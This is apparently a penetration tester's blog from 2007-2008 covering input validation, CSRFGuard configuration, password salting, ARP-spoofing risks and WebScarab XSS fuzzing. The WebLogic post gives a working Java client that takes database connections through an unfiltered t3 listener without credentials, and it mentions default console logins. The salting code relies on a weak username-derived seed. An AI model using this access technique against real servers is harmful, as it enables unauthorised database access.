Confessions of a Penetration Tester

God doesn't play dice. Quantum Crypto is Closer.

2008-10-10T22:55:00.004-05:00

A quantum crypto device has finally been tested and demonstrated to the BBC. This will be interesting to see how the devices hold up. Quantum Crypto is based on an odd principle of quantum theory called the Heisenberg Uncertainty Principle. It states that the act of observing an experiment changes the outcome. The current model is communicating over fiber optic cable and can communicate with 5 locations in Vienna. Due to the above mentioned principal, if someone where to perform a MiTM attack or sniff the traffic it would change the outcome of the desired result. The system would then produce a very high rate of errors and once this is detected the system will automatically shut itself down to prevent the interception of any confidential data. They are claiming that this will be an un-breakable encryption and i agree if it truly conforms to the Heisenberg Uncertainty Principle then it should be unbreakable. It will be interesting to see how many government allow this technology within its borders once its perfected. Most governments want at least a backdoor or limit the encryption strength. They have made the system to be robust and to reroute itself incase a quantum link breaks down so not to loose data between the two links.

"We are constantly in touch with insurance companies and banks, and they say it's nearly better that they lose 10m euros than if the system is down for two hours, because that might be more damaging for the bank," said Dr Huebel.

But one thing I have learned in security .. never say you are unbreakable. It would be interesting to see if hackers find a flaw in quantum theory that physicists including Albert Einstein have overlooked for years.

Source: http://news.bbc.co.uk/2/hi/science/nature/7661311.stm

Ghetto Input validation.

2008-10-10T15:51:00.001-05:00

I was consulting on a project a few months ago that had very little budget but kept getting hacked weekly. The application was in ASP but that does not really matter for the point that I'm about to make. Since they had very little money and very little time and I wanted to perform very strict input validation I came up with a solution that I am surprised that I have never seen before. Why not just validate the entire query string instead of individual parameters. The entire site has very few post parameters and kept getting hacked through all the GET parameters so I wrote a simple ASP script that I could add to the beginning of every page. If that validation failed then the whole site would redirect to error otherwise execute the page code. I validated the post params individually since there where so few. I know that really what these guys needed to do was use bindable queries but there was aaaaallloottt of SQL and they only accepted alpha numeric, upper and lower case letters. Can anyone think of a reason how this could be exploitable. One quick statement and we stopped all XSS and SQL injection attacks against this site. These guys where also a very small business that could not afford to be down for days while the code was being developed. For an enterprise I would prolly would not recommend this but for a small startup or local business then I think this could really help.

Here is my Classic ASP code.

Validation.asp

Function ValidateQueryString( input)
    Dim re
    Set re = New RegExp
    ' alphanumeric regular expression
    re.global = True
    re.Pattern = "^[a-zA-Z0-9\=\&\ ]+$"
    re.Test(input)
    if(re.Test(input) or input = "") then
        ValidateQueryString = True
    else
        ValidateQueryString = False
    end if
End Function

every page will include this line at the top...

<%
if(ValidateQueryString(request.QueryString) = False) then
response.redirect("error.asp")
end if
%>

No longer confident.

2008-10-09T22:27:00.006-05:00

This is something that has really started to annoy me ever since I realized it. It came to me while I was playing with ettercap filters. For those who don't know you can use ettercap to perform ARP spoofing and MiTM attacks. etterap filters give you the added functionality to modify any traffic going to and from the victim or victims that you are ARP Spoofing. This has been fun to do things like replace all the images in webpages that your co-worker has been viewing with your own image that you host. Like the following.

Thats fun and all but now I have noticed something that ALOT of websites including many financial institutions are doing. They are trying (i assume) to make their home pages load faster by not SSL'ing their home page but still providing login functionality on this page. They usually have a JavaScript fuction that actually submits your credentials over SSL or it could be in a form. So it occurred to me that anyone who happens to be on my same subnet can ARP spoof me and change the javascript . The javascript could be modified to intercept my credentials, send them to another server, and still log me in and I would never know it. In fact i'm not sure of anything that most users can do to know that they are not a victim.

This is a poor coding practice that takes away all the visual cues that browsers are putting in place to ensure that you are sending your credentials over a secure link and training users not too look for them. Its not that hard to have a button that says "click here to sign in" to redirect you to an SSL'd login page. I have seen some sites that are ssl's but load some of their javascript from non-ssl'd sources which could allow for session stealling from sites that do set their cookies securly. My recomendations to developers are:

1. Only allow your users to enter crendentials on an SSL'd page.

2. Once users are on a secure section of the site then load all your javascript, images, or any other included content from only ssl'd sources as well.

CSRFGuard Take 2

2008-06-12T00:42:00.001-05:00

Well I been doing a little more experimentation with CSRFGuard and realized I have a flawed configuration in my last post. I figured that the initial page (say your login page) had to be outside your CSRF protected filter because you do not have a session and therefore no csrf token and the filter would fail. But it fails open. At first I thought this was a flaw but this makes perfect sense. You can now protect all your content with one csrf filter and not have to keep a special directory unprotected for your login pages and the like.

Another trick that CSRFGuard does is to automatically add your csrf token to your links in most cases. This makes it easier to integrate csrfguard into an existing application and makes it trivial to ensure that every request is sending the csrftoken without you having to code around it. I found that for some dynamically generated code like response.sendRedirect("index.jsp"); this will not work without a little help.

There are a few different response handlers that you can set in the csrfguard.properties for CSRFGuard to automatically add your token to your html. They are:

org.owasp.csrfguard.handlers.HTMLParserHandler will automatically parse the html response for a urls to attach the csrf token. This is performed server side.

org.owasp.csrfguard.handlers.RegExHandler will allow you to specify a regular expression that be searched in the html response and the append the token to the match. This action again is performed on the server side. I have not tried this one yet.

org.owasp.csrfguard.handlers.JavaScriptHandler will include javascript to your response (csrf.js). This will append csrf tokens on the client and save you some processor time on the server.

The Example

I will walk you through my example that consists of a login page and 2 csrf protected areas.

Here is my basic login page. It does 3 things. (1)If there isn't a session then you are presented with the logon page.(2) if you are submitting your credentials then it checks your credentials then it adds the generated csrf token and your userid to the session. The later is solely to represent a user and nothing to do with csrf guard. Ideally this app would query a sql database or ldap but i'm trying to keep it simple. (3) If you are logged in already and access the logon page then you are redirected back to the csrfProtectedArea1.do

<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
pageEncoding="ISO-8859-1"%>
<jsp:directive.page import="org.owasp.csrfguard.util.*"/>
<jsp:directive.page import="javax.servlet.http.*"/>

<%@ page session="true" %>

String login ="";
String username = "";
String password = "";

// Login is set to 1 when the credentials are sent. not really necessary.

if(login != null && login.equals("1"))
{
    username = request.getParameter("username");
    password = request.getParameter("password");
    if(username != null && password != null && username.equals("Guest") && password.equals("Guest1"))
    {
        HttpSession sess = request.getSession(true);
        sess.setAttribute("uid", "1111");
        response.sendRedirect("/CSRFTest/csrfProtectedArea1.do?OWASP_CSRFTOKEN=" + request.getParameter("OWASP_CSRFTOKEN") );
    }
    else // login failed
    {
        out.write("<h3> Error: Please Log in again </h3><br>");
        out.write("<h1>Please Login Below</h1>");
        out.write("<form method=\"POST\" action=\"index.jsp\">");
        out.write("<br> User Name: <input type=\"text\" name=\"username\">");
        out.write("<br> Password: <input type=\"password\" name=\"password\">");
        out.write("<input type=\"hidden\" name=\"Login\" value=\"1\">");
        out.write("<br> <input type=\"submit\" name=\"loginBtn\" value=\"Login\" >    ");
        out.write("</form>");
    }
}
else if (request.getSession().getAttribute("uid") != null && request.getSession().getAttribute("uid").equals("1111"))
{

//session is active that the userid matches.
    HttpSession sess = request.getSession(true);
    response.sendRedirect("/CSRFTest/csrfProtectedArea1.do?OWASP_CSRFTOKEN=" + sess.getAttribute("OWASP_CSRFTOKEN") );
    //response.sendRedirect("/CSRFTest/csrfServlet.do");
}
else
{

// normal login when a session is not present

        out.write("<h1>Please Login Below.</h1>");
        out.write("<form method=\"POST\" action=\"index.jsp\">");
        out.write("<br> User Name: <input type=\"text\" name=\"username\">");
        out.write("<br> Password: <input type=\"password\" name=\"password\">");
        out.write("<input type=\"hidden\" name=\"Login\" value=\"1\">");
        out.write("<br> <input type=\"submit\" name=\"loginBtn\" value=\"Login\" >    ");
        out.write("</form>");
}

</body>
</html>

Automatic Generation of Tokens

Now in the above code you will notice the following:

response.sendRedirect("/CSRFTest/csrfProtectedArea1.do?OWASP_CSRFTOKEN=" + request.getParameter("OWASP_CSRFTOKEN") );

I'm calling the request.getParamter but my form submission looks like this with no csrf token parameter because the filter will add it to the html automatically.

My generated html on the client for the the login page looks like this:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>LogIn Page</title>
</head>
<body><h1>Please Login Below.</h1><form method="POST" action="index.jsp"><br> User Name: <input type="text" name="username"><br> Password: <input type="password" name="password"><input type="hidden" name="Login" value="1"><br> <input type="submit" name="loginBtn" value="Login" > <INPUT type=hidden name=OWASP_CSRFTOKEN value=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T></form>

</body>
</html>

As you can see the <INPUT type=hidden name=OWASP_CSRFTOKEN value=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T> is automatically generated by the HTMLParseHandler

Now lets look at the csrfProtectedArea1.java. This page is session protected and csrf protected.

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.*;
import javax.servlet.http.*;
import javax.servlet.jsp.*;
import org.apache.jasper.runtime.*;

public class csrfProtectedArea1 extends HttpServlet {
    /**
     *
     */
    private static final long serialVersionUID = -6429166168752177032L;

public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException
{

        HttpSession sess = request.getSession();
        if(sess.getAttribute("uid")!= null && sess.getAttribute("uid").equals("1111"))
        {
            response.setContentType("text/html");
            PrintWriter out = response.getWriter();
            out.println("<html>");
            out.println("<body>");
            out.println("You Made it<br>");
            out.println("<a href=\"csrfProtectedArea2.jsp\" > Click Here </a>");
            out.println("<a href=\"index.jsp\" > Click Here </a>");
            out.println("</body>");
            out.println("</html>");
        }
        else
        {
            response.sendRedirect("/CSRFTest/error.jsp");
        }
    }
}

The generated html from this looks like the following.

<html>
<body>
You Made it<br>
<a href="csrfProtectedArea2.jsp?OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T&OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T" > Click Here </a>
<a href="index.jsp?OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T&OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T" > Click Here </a>
</body>
</html>

I have two links in this response. One goes back to the login page (index.jsp) and the other goes to another csrf protected area. As you can see the response handler automatically updates all links found in the html with the csrf token. One error I keep getting is that the first link gets 2 tokens added to it. I have not figured this out yet but it does not prevent the application for functioning properly.

CSRFGuard Handles the Attack

One other cool thing about csrfGuard is that if you submit a request with a missing or incorrect token CSRFGuard will invalidate your session and redirect you to the error page defined in the csrfguard.properties file.

One problem I have found with this is in the logging. For instance here is an example log file from a failed csrf request.

Jun 12, 2008 12:12:31 AM org.apache.catalina.core.ApplicationContext log
INFO: [CSRFGuard] the following properties were loaded into CSRFGuard
     Debug:            true
     ResponseHandler:    org.owasp.csrfguard.handlers.HTMLParserHandler
     Token Name:        OWASP_CSRFTOKEN
     Token Length:        32
     PRNG:            SHA1PRNG
     Action Count:        3
        Action(0)    org.owasp.csrfguard.actions.Redirect
        Action(1)    org.owasp.csrfguard.actions.Log
        Action(2)    org.owasp.csrfguard.actions.Invalidate

Jun 12, 2008 12:14:28 AM org.apache.catalina.core.ApplicationContext log
INFO: [CSRFGuard] the following properties were loaded into CSRFGuard
     Debug:            true
     ResponseHandler:    org.owasp.csrfguard.handlers.HTMLParserHandler
     Token Name:        OWASP_CSRFTOKEN
     Token Length:        32
     PRNG:            SHA1PRNG
     Action Count:        3
        Action(0)    org.owasp.csrfguard.actions.Redirect
        Action(1)    org.owasp.csrfguard.actions.Log
        Action(2)    org.owasp.csrfguard.actions.Invalidate

Jun 12, 2008 12:14:59 AM org.apache.catalina.core.ApplicationContext log
INFO: [CSRFGuard] caught CSRF attack (IP: 0:0:0:0:0:0:0:1 Method: GET URI: %2FCSRFTest%2FcsrfProtectedArea1.do Referer: Parameters: OWASP_CSRFTOKEN%3DPzEIce4raEWbtC97i8oMgf3Y2yJjf1A1XriZ7GcWaLU)
Jun 12, 2008 12:16:36 AM org.apache.catalina.core.ApplicationContext log
INFO: [CSRFGuard] caught CSRF attack (IP: 0:0:0:0:0:0:0:1 Method: GET URI: %2FCSRFTest%2F Referer: Parameters: )
Jun 12, 2008 12:17:00 AM org.apache.catalina.core.ApplicationContext log
INFO: [CSRFGuard] caught CSRF attack (IP: 0:0:0:0:0:0:0:1 Method: POST URI: %2FCSRFTest%2Findex.jsp Referer: http%3A%2F%2Flocalhost%3A8080%2FCSRFTest%2Findex.jsp%3FOWASP_CSRFTOKEN%3DOX7CJcASSH10DsQFhHQy6nIBHbuYWeXRguxeCjLch5Iu Parameters: password%3DGuest1%2COWASP_CSRFTOKEN%3DOX7CJcASSH10DsQFhHQy6nIBHbuYWeXRguxeCjLch5I%2CLogin%3D1%2CloginBtn%3DLogin%2Cusername%3DGuest)

It will log all parameters from the failed request which in this case will log the username and password of the user. Something to consider if deploying CSRFGuard to a production system.

Additional Information

Below are the csrfguard.properties and the web.xml i used.

csrfguard properties file:

org.owasp.csrfguard.Debug=true
org.owasp.csrfguard.ResponseHandler=org.owasp.csrfguard.handlers.HTMLParserHandler
org.owasp.csrfguard.TokenName=OWASP_CSRFTOKEN
org.owasp.csrfguard.TokenLength=32
org.owasp.csrfguard.PRNG=SHA1PRNG
org.owasp.csrfguard.action.class.Log=org.owasp.csrfguard.actions.Log
org.owasp.csrfguard.action.class.Invalidate=org.owasp.csrfguard.actions.Invalidate
org.owasp.csrfguard.action.class.Redirect=org.owasp.csrfguard.actions.Redirect
org.owasp.csrfguard.action.class.Redirect.param.ErrorPage=error.jsp

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">
<display-name>CSRFTest</display-name>
<welcome-file-list>
    <welcome-file>index.html</welcome-file>
    <welcome-file>index.htm</welcome-file>
    <welcome-file>index.jsp</welcome-file>
    <welcome-file>default.html</welcome-file>
    <welcome-file>default.htm</welcome-file>
    <welcome-file>default.jsp</welcome-file>
</welcome-file-list>
<filter>
<filter-name>CSRFGuard</filter-name>
<filter-class>org.owasp.csrfguard.CSRFGuardFilter</filter-class>
    <init-param>
      <param-name>config</param-name>
      <param-value>WEB-INF/csrfguard.properties</param-value>
    </init-param>
</filter>

<filter-mapping>
<filter-name>CSRFGuard</filter-name>
<servlet-name>csrfProtectedArea1</servlet-name>
</filter-mapping>

<filter-mapping>
<filter-name>CSRFGuard</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>CSRFGuard</filter-name>
<url-pattern>*.jsp</url-pattern>
</filter-mapping>

<servlet>
      <servlet-name>csrfProtectedArea1</servlet-name>
      <servlet-class>csrfProtectedArea1</servlet-class>
</servlet>
<servlet-mapping>
      <servlet-name>csrfProtectedArea1</servlet-name>
      <url-pattern>/csrfProtectedArea1.do</url-pattern>
</servlet-mapping>
</web-app>

CSRFGuard Testing

2008-06-05T15:48:00.001-05:00

Well I have been playing with CSRFGuard lately from the OWASP website. Its basically allows you to set up certain pages that are CSRF protected and whenever a link is selected the http request is parsed for a token that you define and checks if that token is in your session. Below is some sample code all running on Tomcat 6X. I'm not sure if I have this completely the way they intended but it works.

Example CSRFGuard.properties:

org.owasp.csrfguard.Debug=true
org.owasp.csrfguard.ResponseHandler=org.owasp.csrfguard.handlers.JavaScriptHandler
org.owasp.csrfguard.TokenName=OWASP_CSRFTOKEN
org.owasp.csrfguard.TokenLength=32
org.owasp.csrfguard.PRNG=SHA1PRNG
org.owasp.csrfguard.action.class.Log=org.owasp.csrfguard.actions.Log
org.owasp.csrfguard.action.class.Invalidate=org.owasp.csrfguard.actions.Invalidate
org.owasp.csrfguard.action.class.Redirect=org.owasp.csrfguard.actions.Redirect
org.owasp.csrfguard.action.class.Redirect.param.ErrorPage=error.jsp

You can name the org.owasp.csrfguard.TokenName can be set to what ever you want as long as you set it in your code.

Example web.xml:

My Web.xml. Here you define the location and name of the csrfguard.properties and the resources that you wish to protect with CSRFGuard. Here I am protecting the csrfServlet.

<filter-mapping>
<filter-name>CSRFGuard</filter-name>
<servlet-name>csrfServlet</servlet-name>
</filter-mapping>

<filter-mapping>
<filter-name>CSRFGuard</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>

<servlet>
      <servlet-name>csrfServlet</servlet-name>
      <servlet-class>csrfServlet</servlet-class>
</servlet>
<servlet-mapping>
      <servlet-name>csrfServlet</servlet-name>
      <url-pattern>/csrfServlet.do</url-pattern>
</servlet-mapping>
</web-app>

Example Login Page:

My Login page (kinda). This page should not be inside the CSRFGuard filter defined in the web.xml. I actually don't log in but establish a session and add my OWASP_CSRFTOKEN to my session.

<%@ page session="true" %>

<%
TokenGenerator token = new TokenGenerator();
HttpSession sess = request.getSession(true);
String csrf = token.generateCSRFToken("SHA1PRNG",32);
sess.setAttribute("OWASP_CSRFTOKEN", csrf);

%>
<a href="/CSRFTest/csrfServlet.do?OWASP_CSRFTOKEN=<%=csrf %>" > Click me to get to Protected Site </a>

</body>
</html>

Protected Servlet:

Below is my csrfServlet.java. There is really nothing in this code except a message stating that you made it this far.

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.*;
import javax.servlet.http.*;
import javax.servlet.jsp.*;
import org.apache.jasper.runtime.*;

public class csrfServlet extends HttpServlet {
    /**
     *
     */
    private static final long serialVersionUID = -6429166168752177032L;

public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException
{

        response.setContentType("text/html");
        PrintWriter out = response.getWriter();
        out.println("<html>");
        out.println("<body>");
        out.println("You Made it");
        out.println("</body>");
        out.println("</html>");
    }
}

Now I have it a working CSRF filter. For this to work all my links need to be dynamically generated to include OWASP_CSRFTOKEN=blah as in my login page or Posted through hidden fields in a form.

My questions now are:
How well will this work in a clustered environment?
How to ensure that the application has been carefully coded not to give up the CSRFToken by accident. I'm working on a proof of concept for this one.

Let me know if there is anyone else out there using CSRFGuard and your experiences with it.

Secure salt, for tasty hashes

2008-05-07T15:20:00.005-05:00

There is a right way and a less secure way to salt. I have heard all kinds of reasons to salt but let’s remember that this only stops someone from using a dictionary attack against your hashes. I have heard some blog posts say that this prevents rainbow table attacks which I believe is inaccurate. Consider the following. I have a salt ‘12345678901234567890’. Now I will combine passwords like this 12345678901234567890 + password. Now I will sha256 it and get JLKyuoTkWpu1nKzx24By0G45ACAQg9XvJIAbYXT0mo8= . I do the same thing with the password being password2 which equals vwXZcCYEybvlfdm1xwOXnrXo0sWX+f634njY3SMVyaI= .

For a rainbow table to work I need generate a large set of data, hash that data, then compare hashes with the compromised data. If the hashes match I return the value of the generated data.
Now at this point ignore the computational time and storage. If I do a brute force and compute hashes for the rainbow and notice the following:

JLKyuoTkWpu1nKzx24By0G45ACAQg9XvJIAbYXT0mo8= returns 12345678901234567890password

and

vwXZcCYEybvlfdm1xwOXnrXo0sWX+f634njY3SMVyaI= returns 12345678901234567890password2

If I could find just two or three numbers with the same salt then i would not have to calculate the entire space N character space. I can deduce that the salt is 12345678901234567890 since each number begins with it. Now that I know the salt i can begin doing dictionary attacks with the salt + 'dictionary word' or compute every possible combination of salt + alphanumeric characters.

One other thing I would like to point out is that if i could pre-calculate the entire space(salt + password) then I can identify collisions this way as well. If I notice a lot of numbers that begin with 12345678901234567890 and just a few that do not then the few that do not I can ignore as erroneous or try to find a match to a value later in the rainbow table.

Now I will point out possible hashing scenarios and what it would take to brute force them.

Scenario 1: Known salt, known passwords requirements.
Lets say I have compromised a database of sha1 password hashes with a password length that must be exactly 8 char alphanumeric. I know the salt so now I only need to calculate
64^8 minus 64^7. Because the password length is exactly 8 characters I can subtract 64^7 since any 7 character or below password hashes would not be valid. Go to the explanation section to see where I get the numbers if your unsure. I need to calculate 214,818,490,978,688 hashes. On my machine it takes 2.57952379422524 seconds to calculate 1,000,000 sha1 hashes. So I can calculate the entire space in .. 17.5713 years! Sounds like a lot but if I can recruit a bot net or distributed computing then I can take 100 machines to calculate the space in about 63 days.

Scenario 2: Different salt for every hash, known salt, and known password requirements. A much better way!

Now to figure out one password hash I need to compute the entire space with the unique salt to get one password. I assume here that the salt is public like the username or database creation date. Some value that is readily available from the compromised database So using the same logic as before but I will need 63 days for EACH password using a distributed computing system. This is much more time consuming to compute and therefore more secure.

Scenario 3: Unique salt that is long and algorithmically calculated for every hash.

Below is an example code of what I believe is a very secure hashing implementation based on Scenario 2 but with the salt algorithmically generated. It is written in c#. I use the username to generate a value that acts as a seed to a random number generator. I concatenate multiple generated random numbers to create my salt. Then prepend to the salt to the password before hashing. For a rainbow table to be computed and the algorithm to compute the salt is unknown the user would have to calculate roughly 64^45 possible combinations or more. Of course if the algorithm is known then the scenario is identical to Scenario 2. This code allows you to create very long yet unique salts for every password hash.


using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Security.Cryptography;
using System.Diagnostics;

namespace crypto
{
class Program
{
    static void Main(string[] args)
    {
        string username = "ascetik";
        string clearText = "password";
        byte[] userBytes;
        string salt;
        byte[] saltandclear;
        byte[] cipherText;
        string hashedString = "";


        //Generate the salt. This could be any algorithm you choose. I took
        // the username, converted to a byte array, then XORed the bytes together.
        // I took the xored result as the seed to my random number generator.
        // Then i used the result of the PRG as my salt.
        userBytes = ASCIIEncoding.ASCII.GetBytes(username);
        long XORED = 0x00;
        foreach (int x in userBytes)
            XORED = XORED ^ x;
    
        Random rand = new Random(Convert.ToInt32(XORED));
        salt = rand.Next().ToString();
        salt += rand.Next().ToString();
        salt += rand.Next().ToString();
        salt += rand.Next().ToString();
    
        //prepend the salt to the clear text and convert to byte array
        saltandclear = ASCIIEncoding.ASCII.GetBytes(salt + clearText);
        Console.Out.WriteLine(“salt + password length:” + saltandclear.Length);
        //compute sha256 hash
        SHA256 sha256 = new SHA256Managed();
        cipherText = sha256.ComputeHash(saltandclear);
 

        Console.Out.WriteLine(Convert.ToBase64String(cipherText));
        Console.In.ReadLine();


    }
}
}

Conclusion
Using a unique salt, that is algorithmically created, for each hash could drastically improve the confidentiality of a system. I better way would be to run a mixing algorithm like a hash over the data and using the result as the password to hash or hashing twice. With this option even if all the hashes where matched to entries in the rainbow table the data would still be useless. But the con to this is that it could increase the chance for data collisions and is not recommended. I’ll leave this up to the crypto experts to figure out. It seems that for now that Scenario 2 and 3 are efficient mitigation against rainbow table and dictionary attacks attacks.

Explanation of numbers:
Alpha chars = 26
Upper and lower case chars = 2*26= 52
Numbers = 10
All Possible Alphanumeric with 8 chars = (52 +10)^8
All Possible values with 7 characters is 62^7
All Possible characters that are exactly 8 characters in length = 62^8 - 62^7

Slashdot It!

Fun With WebLogic Connection Pools- Free database connections

2008-03-03T16:47:00.003-06:00

I have found a huge mis-configuration in the several of the WebLogic Servers that I audit. Most applications that are running on WebLogic use something called Database Connection Pools. These are database connections that the WebLogic server makes and the applications configured within WebLogic can use. You configure all these database credentials inside the WebLogic console so that the application doe not need to have access to these credentials to run queries, update, delete, etc. This can be great from a security policy standpoint in that you don't have to have developers being knowledgeable of the production database credentials for the app to function. This is also the root of the problem if the WebLogic server has not enabled connection filters.

WebLogic has a proprietary protocol called t3. This protocol will allow an improperly configured WebLogic instance accept connections from anywhere and any server. This means you can access the database through WebLogic without providing any database credentials. There are only 3 pieces of information that you need to know.

the server name (easy to get).
the port that WebLogic is listening on to accept t3 connections. Sometimes 7001 sometimes something else. I usually do an nmap scan of the server and then try connections over t3 until I get a proper connection or an error that implies i have made the connection but my datasource is incorrect.
Know the datasouce name. This can be hard. Most apps name the datasource something like AppNameData source. If you where looking at a Creditcard application. It could be ccDataSource or CreditCardDatasource or just Creditcard. This can take some trial an error unless =) they have not changed the weblogic console default username and password weblogic/weblogic. The url to the weblogic console is http://yourappserver:7001/console. If this does not yield results then do an nmap scan and try connecting to ports till you get the admin console.

Below is an example of creating a t3 client to connect to WebLogic and then query the systables in a DB2 database. You can modify the code to work with any database you need. As you can see i never provide credentials and i still have access to the database.



import java.util.*;
import java.math.BigDecimal;
import java.sql.*;
import javax.naming.*;
import java.sql.Connection;

public class DataTest
{
 public static void main(String[] args)
 {
  InitialContext ctx = null;
  Connection connection = null;
  Statement stmt = null;
  ResultSet rs = null;
  Hashtable ht = null;
  String status = null;
  String resCode = null;
  String retCode = null;
  String retMsg = null;
  BigDecimal sqlCode = null;
  String serverName = "yourservername.com:andPort";
  String dataSource = "YourDataSource";

  try
  {
   ht = new Hashtable();
   ht.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
   ht.put(Context.PROVIDER_URL, "t3://" + serverName);
   ctx = new InitialContext(ht);
   connection = ((javax.sql.DataSource)ctx.lookup( dataSource )).getConnection();
   
   // check for excessive permissions in db2
   String sql = "select name, creator, colcount from sysibm.systables";

   //find the username you are conneting with in weblogic
   //String sql = "select user,1,1 from sysibm.sysdummy1";

   // normal check but you must know the db owner and table name for db2
   //String sql = "select col1, col2, col3 from dbowner.dbtableName";




   stmt = connection.createStatement();
   rs = stmt.executeQuery(sql);
   while(rs.next())
    System.out.println(rs.getString(1) + " - " + rs.getString(2) + " - " + rs.getString(3));



  }
  catch(Exception e)
  {
   e.printStackTrace();
  }
  finally
  {
   try
   {    
    if(stmt!=null)
     stmt.close();
    stmt = null;
    
    if(connection!=null)
     connection.close();
    connection = null;

    if(ctx!=null)
     ctx.close();
    ctx = null;
   }
   catch(Exception e)
   {
    e.printStackTrace();
   }
  }
 }
}

Example of pulling database tables from Eclipse:

here is an example of a good error message from your client. This will let you know that you have been successful in finding a weblogic connection pool but do not have a valid datasource name. Here the invalid datasource name was called testSource.



javax.naming.NameNotFoundException: Unable to resolve 'testSource'. Resolved '' [Root exception is javax.naming.NameNotFoundException: Unable to resolve 'testSource'. Resolved '']; remaining name 'testSource'
 at weblogic.rjvm.BasicOutboundRequest.sendReceive(BasicOutboundRequest.java:108)
 at weblogic.rmi.cluster.ReplicaAwareRemoteRef.invoke(ReplicaAwareRemoteRef.java:290)
 at weblogic.rmi.cluster.ReplicaAwareRemoteRef.invoke(ReplicaAwareRemoteRef.java:247)
 at weblogic.jndi.internal.ServerNamingNode_814_WLStub.lookup(Unknown Source)
 at weblogic.jndi.internal.WLContextImpl.lookup(WLContextImpl.java:371)
 at weblogic.jndi.internal.WLContextImpl.lookup(WLContextImpl.java:359)
 at javax.naming.InitialContext.lookup(Unknown Source)
 at DataTest.main(DataTest.java:35)
Caused by: javax.naming.NameNotFoundException: Unable to resolve 'testSource'. Resolved ''
 at weblogic.jndi.internal.BasicNamingNode.newNameNotFoundException(BasicNamingNode.java:1139)
 at weblogic.jndi.internal.BasicNamingNode.lookupHere(BasicNamingNode.java:252)
 at weblogic.jndi.internal.ServerNamingNode.lookupHere(ServerNamingNode.java:171)
 at weblogic.jndi.internal.BasicNamingNode.lookup(BasicNamingNode.java:206)
 at weblogic.jndi.internal.RootNamingNode_WLSkel.invoke(Unknown Source)
 at weblogic.rmi.internal.BasicServerRef.invoke(BasicServerRef.java:548)
 at weblogic.rmi.cluster.ClusterableServerRef.invoke(ClusterableServerRef.java:224)
 at weblogic.rmi.internal.BasicServerRef$1.run(BasicServerRef.java:438)
 at weblogic.security.acl.internal.AuthenticatedSubject.doAs(AuthenticatedSubject.java:363)
 at weblogic.security.service.SecurityManager.runAs(SecurityManager.java:147)
 at weblogic.rmi.internal.BasicServerRef.handleRequest(BasicServerRef.java:434)
 at weblogic.rmi.internal.BasicServerRef.access$300(BasicServerRef.java:57)
 at weblogic.rmi.internal.BasicServerRef$BasicExecuteRequest.run(BasicServerRef.java:965)
 at weblogic.work.ExecuteThread.execute(ExecuteThread.java:209)
 at weblogic.work.ExecuteThread.run(ExecuteThread.java:181)

This problem is easy to fix. Just enable connection filers in your weblogic console and your done!.
http://edocs.bea.com/wls/docs81/secmanage/domain.html

Slashdot It!

Visio's Built in Web Spider

2007-12-09T21:36:00.000-06:00

There is this really great feature in visio 2003 that is excellent for website spidering and mapping. I rarely find a need for a microsoft product but this one is actually very useful. If you have installed the web diagram options for visio then you can start a web site map. As soon as you select this link you are prompted for a URL. After entering the URL visio will spider the entire site and create a nice mapping of most areas of the site. It even shows you broken links. The only problem is that currently i dont see a way to log in to protected sites automatically but you can click on a node from the generated Visio and start interactive mode. This will start a browser in visio that will allow you to log in and navigate the site as well as record your movements on the visio diagram.

This could be very useful for both blackbox and white box testing. It may even uncover parts of the site you missed during your initial investigation of your audit target. I just started looking into it so i don't know how much it will assist me but

Slashdot It!

WebScarab Scripting and Fuzzing.

2007-12-08T23:13:00.001-06:00

I have been really busy and have therefore not posted in a while. Work has really consumed me and I was studying to take the CEH (Certified Ethical Hacker) on Dec. 1st. Which a am very proud to say that I am now a Certified Ethical Hacker! Well, I have spent a lot of time working on fuzzers and ways to make my penetration testing more efficient. I have recently discovered the scripting options in webscarab (written by Rogan Dawes) and been trying to make some use of this feature. What I wrote was simple script that once an XSS exploit has been found it will write a screen scrape of that page to the file system. This way you can quickly identify which attacks worked and which ones did not using the Fuzzer plugin within WebScarab. Here is the script:


import org.owasp.webscarab.model.ConversationID;

import org.owasp.webscarab.model.HttpUrl;

import org.owasp.webscarab.model.Request;

import org.owasp.webscarab.model.Response;

import java.text.DateFormat;

import java.text.SimpleDateFormat;

import java.io.BufferedReader;

import java.io.BufferedWriter;

import java.io.FileReader;

import java.io.FileWriter;

import javax.swing.JOptionPane;





String xssFile = "/home/ascetik/xss.txt";
// Load xss strings
DateFormat df = new SimpleDateFormat( "yyyyMMdd-hhmmss" );

String date = df.format(new java.util.Date());

String outFile = "/home/ascetik/screenScrapes/ss-" + date + ".html";
// save file based on date
BufferedReader xssStrings = new BufferedReader(new FileReader(xssFile));

BufferedWriter bfOut = new BufferedWriter(new FileWriter(outFile));

Response response  = conversation.getResponse();
// conversation Response
Request request = conversation.getRequest();
// conversation Request
byte[] hexResp = response.getContent();
// get the screen scrape
String raw = new String(hexResp);
